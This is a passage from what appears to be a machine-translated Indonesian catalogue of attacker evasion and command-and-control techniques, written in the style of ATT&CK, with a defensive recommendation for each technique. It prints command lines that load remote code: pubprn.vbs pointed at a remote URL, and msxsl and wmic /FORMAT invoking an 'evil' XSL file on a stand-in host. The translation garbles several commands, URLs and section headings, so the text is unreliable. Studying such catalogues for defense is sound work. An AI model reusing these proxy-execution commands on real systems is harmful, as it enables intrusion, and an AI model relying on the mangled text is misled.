sertifikat Microsoft dan dapat digunakan untuk menjalankan file dari server jarak jauh:cscript C: \ Windows \ System32 \ Printing_Admin_Scripts \ skrip ru-RU \ pubprn.vbs 127.0.0.1: http [:] // 192.168.1.100/hi.pngRekomendasi perlindungan: Skrip bertandatangan seperti itu mungkin tidak diperlukan pada sistem Anda, jadi pertimbangkan untuk memblokir peluncurannya.Sistem: WindowsKeterangan:Pengemasan perangkat lunak melibatkan penggunaan metode kompresi atau enkripsi musuh untuk file yang dapat dieksekusi, menghasilkan perubahan dalam checksum file, yang menghindari deteksi berdasarkan pencarian tanda tangan statis. Sebagian besar metode dekompresi mendekompresi kode yang dapat dieksekusi dalam memori. Contoh utilitas populer - pengepak file yang dapat dieksekusi adalah MPRESS dan UPS, namun, ada banyak pengepak lainnya yang diketahui, di samping itu, lawan dapat membuat metode pengemasan sendiri yang tidak akan meninggalkan artefak seperti pengemasan terkenal. Pengemasan file yang dapat dieksekusi bukanlah indikator malware yang jelas, karena pengembang perangkat lunak yang sah dapat menggunakan metode pengemasan untuk mengurangi ukuran paket distribusi atau melindungi kode hak milik.Rekomendasi Perlindungan:Perbarui alat perlindungan anti-virus, buat tanda tangan khusus untuk deteksi malware, dan gunakan metode deteksi heuristik. Identifikasi dan blokir perangkat lunak yang berpotensi berbahaya.Sistem: Linux, macOSHak: Deskripsi Pengguna:Penyerang dapat menyembunyikan tipe file yang sebenarnya dengan mengubah ekstensinya. Untuk jenis file tertentu (tidak bekerja dengan file .app), menambahkan karakter spasi ke akhir nama file akan mengubah cara file diproses oleh sistem operasi. Misalnya, jika ada file yang dapat dieksekusi, Mach-O dengan nama evil.bin, maka ketika pengguna mengklik dua kali, OS akan meluncurkan Terminal.app dan menjalankannya. Jika file yang sama diubah namanya menjadi evil.txt, maka ketika Anda mengklik dua kali, itu akan mulai di editor teks. Namun, jika file diubah namanya menjadi "evil.txt" (spasi di akhir), maka dengan mengklik dua kali jenis file yang benar, OS akan ditentukan dan file biner akan dimulai. Penyerang dapat menggunakan teknik ini untuk menipu pengguna agar meluncurkan file yang dapat dieksekusi berbahaya.Rekomendasi Perlindungan:Penggunaan teknik ini sulit dicegah karena penyerang menggunakan mekanisme operasi standar OS, sehingga vektor perlindungan harus diarahkan untuk mencegah tindakan jahat pada tahap awal serangan, misalnya, pada tahap pengiriman atau pembuatan file berbahaya dalam sistem.Sistem: Windows,Hak Linux : Pengguna, Administrator,Deskripsi Sistem : Timestomp adalah perubahan cap waktu file (perubahan, akses, pembuatan). Seringkali metode cap waktu digunakan untuk menutupi file yang telah dimodifikasi atau dibuat oleh penyerang sehingga mereka tidak terlihat oleh ahli forensik dan alat forensik. Timestamping dapat digunakan bersama dengan masking nama file untuk menyembunyikan alat malware dan penyusup.Rekomendasi Perlindungan:Arahkan vektor perlindungan untuk mencegah peluncuran perangkat lunak yang berpotensi berbahaya dan berbahaya. Forensik menjelaskan metode untuk mengatur alat untuk mendeteksi modifikasi cap waktu dengan mengumpulkan informasi tentang membuka file descriptor dan membandingkannya dengan cap waktu yang ditentukan dalam file.Sistem: Hak Windows :Deskripsi Pengguna : Ada banyak utilitas yang digunakan oleh pengembang perangkat lunak dan yang dapat digunakan untuk mengeksekusi kode dalam berbagai bentuk selama pengembangan perangkat lunak, debugging, dan rekayasa terbalik. Utilitas ini sering kali ditandatangani dengan sertifikat digital yang memungkinkan mereka untuk mem-proksi kode berbahaya di OS, memintas mekanisme keamanan dan lembar putih aplikasi.• MSBulid adalah platform pengembangan perangkat lunak yang digunakan dalam Visual Studio. Ini menggunakan proyek dalam bentuk file XML yang menggambarkan persyaratan untuk membangun berbagai platform dan konfigurasi. MSBuild dari .NET versi 4 memungkinkan Anda untuk memasukkan kode C # ke proyek XML, kompilasi, dan kemudian jalankan. MSBulid.exe ditandatangani oleh Microsoft Digital Certificate.• DNX - .Net Execution Environmant (dnx.exe) adalah kit pengembangan untuk Visual Studio Enterprise. Dihentikan sejak .NET Core CLI pada tahun 2016. DNX tidak ada pada build Windows standar dan hanya dapat ada pada host pengembang saat menggunakan .Net Core dan ASP.NET Core 1.0. Dnx.exe ditandatangani secara digital dan dapat digunakan untuk eksekusi kode proxy.• RCSI adalah antarmuka baris perintah non-interaktif untuk C #, mirip dengan csi.exe. Itu diperkenalkan di versi sebelumnya dari platform kompiler Roslyn .Net. Rcsi.exe ditandatangani oleh Microsoft Digital Certificate. File skrip C # .csx dapat ditulis dan dieksekusi menggunakan Rcsi.exe pada prompt perintah Windows.• WinDbg / CDB adalah kernel MS Windows dan utilitas untuk debugging dalam mode pengguna. Microsoft console debugger cdb.exe juga merupakan mode-debugger pengguna. Kedua utilitas dapat digunakan sebagai alat mandiri. Biasa digunakan dalam pengembangan perangkat lunak, rekayasa terbalik, dan tidak dapat ditemukan pada sistem Windows biasa. Baik file WinDbg.exe dan CDB.exe ditandatangani oleh Microsoft Digital Certificate dan dapat digunakan untuk kode proxy.• Pelacak - utilitas pelacak file pelacak.exe. Termasuk dalam. NET sebagai bagian dari MSBuild. Digunakan untuk mendaftarkan panggilan dalam sistem file Windows 10. Penyerang dapat menggunakan tracker.exe untuk menjalankan DLL dalam berbagai proses. Tracker.exe juga ditandatangani dengan sertifikat Microsoft.Rekomendasi Perlindungan: , .
Deskripsi: Penyerang dapat mencuri kredensial pengguna atau akun layanan tertentu menggunakan kredensial akses, menangkap kredensial dalam proses intelijen menggunakan rekayasa sosial. Kredensial yang dikompromikan dapat digunakan untuk mem-bypass sistem kontrol akses dan mendapatkan akses ke sistem jarak jauh dan layanan eksternal, seperti VPN, OWA, Remote Desktop, atau untuk mendapatkan hak yang lebih tinggi pada sistem dan area spesifik jaringan. Jika skenario berhasil, penyerang dapat menolak malware untuk membuatnya sulit dideteksi. Selain itu, penyerang dapat membuat akun menggunakan nama dan kata sandi yang telah ditentukan untuk mempertahankan akses cadangan jika ada upaya yang gagal untuk menggunakan cara lain.
Rekomendasi perlindungan: Terapkan kebijakan kata sandi, ikuti rekomendasi untuk merancang dan mengelola jaringan perusahaan untuk membatasi penggunaan akun istimewa di semua tingkat administrasi. Pemeriksaan rutin domain dan akun lokal dan hak-hak mereka untuk mengidentifikasi mereka yang dapat memungkinkan penyerang mendapatkan akses luas. Memantau aktivitas akun menggunakan sistem SIEM.
Sistem: Windows
Hak: Pengguna
Deskripsi: Penyerang dapat menggunakan layanan Web eksternal yang berjalan dan sah sebagai cara mengirim perintah untuk mengendalikan sistem yang terinfeksi. Server manajemen disebut Command and control (C&C atau C2). Situs web dan jejaring sosial populer dapat bertindak sebagai mekanisme untuk C2, dan berbagai layanan publik seperti Google atau Twitter juga dapat digunakan. Semua ini membantu menyembunyikan aktivitas jahat dalam keseluruhan arus lalu lintas. Layanan web biasanya menggunakan SSL / TLS, sehingga musuh mendapatkan lapisan perlindungan tambahan.
Rekomendasi Keamanan: Firewall dan proxy web dapat digunakan untuk menerapkan kebijakan komunikasi jaringan eksternal. Sistem IDS / IPS menggunakan analisis tanda tangan dapat mendeteksi malware yang dikenal di tingkat jaringan. Namun, perlu dipertimbangkan bahwa seiring waktu, lawan akan mengubah tanda tangan alat C2 atau membangun kembali protokol sedemikian rupa untuk menghindari deteksi dengan bantuan pertahanan yang biasa digunakan. Penggunaan alat untuk memantau perilaku pengguna juga dapat meningkatkan kemungkinan mendeteksi aktivitas abnormal.
Sistem: Windows
Hak: Pengguna
Deskripsi: Extensible Stylesheet Language (* .xsl) biasanya digunakan untuk menjelaskan pemrosesan data dan rendering dalam file XML. Untuk mendukung operasi kompleks dalam XSL, dimungkinkan untuk menanamkan skrip dalam berbagai bahasa ke dalam kode. Penyerang dapat menyalahgunakan fungsi ini untuk mengeksekusi file sewenang-wenang. Mirip dengan teknik penyalahgunaan utilitas pengembang tepercaya (Trusted Developer Utilities), utilitas tepercaya msxsl.exe, yang mengubah dokumen XML ke bentuk lain (html, wml, rtf, pdf, dll.) Dapat digunakan untuk menjalankan JavaScript berbahaya yang tertanam di lokal atau dihapus (dirujuk melalui URL) file XSL. Karena msxsl.exe tidak diinstal secara default, musuh kemungkinan besar harus mengemasnya dan file lain yang diperlukan. Contoh panggilan msxsl.exe:
pelanggan msxsl.exe [.] xml skrip [.] xsl .
Variasi lain dari teknik ini, disebut Squiblytwo, adalah menggunakan WMI untuk memanggil JScript atau VBScript dari file xsl. Teknik ini, seperti Squiblydoo, yang menyalahgunakan regsrv32.exe, juga menggunakan alat Windows tepercaya:
• File lokal:
daftar proses wmic /FORMAT:evil[..BIZxsl;• File jarak jauh:
osm get / FORMAT :
memutuskanhttps [ :
; // contoh [. † com / evil [. † xsl. "Rekomendasi perlindungan: Jika msxsl.exe tidak digunakan di lingkungan yang dilindungi, batalkan eksekusi. Menonaktifkan WMI sebaliknya dapat menyebabkan ketidakstabilan sistem, dan karena itu memerlukan penilaian awal dari konsekuensi.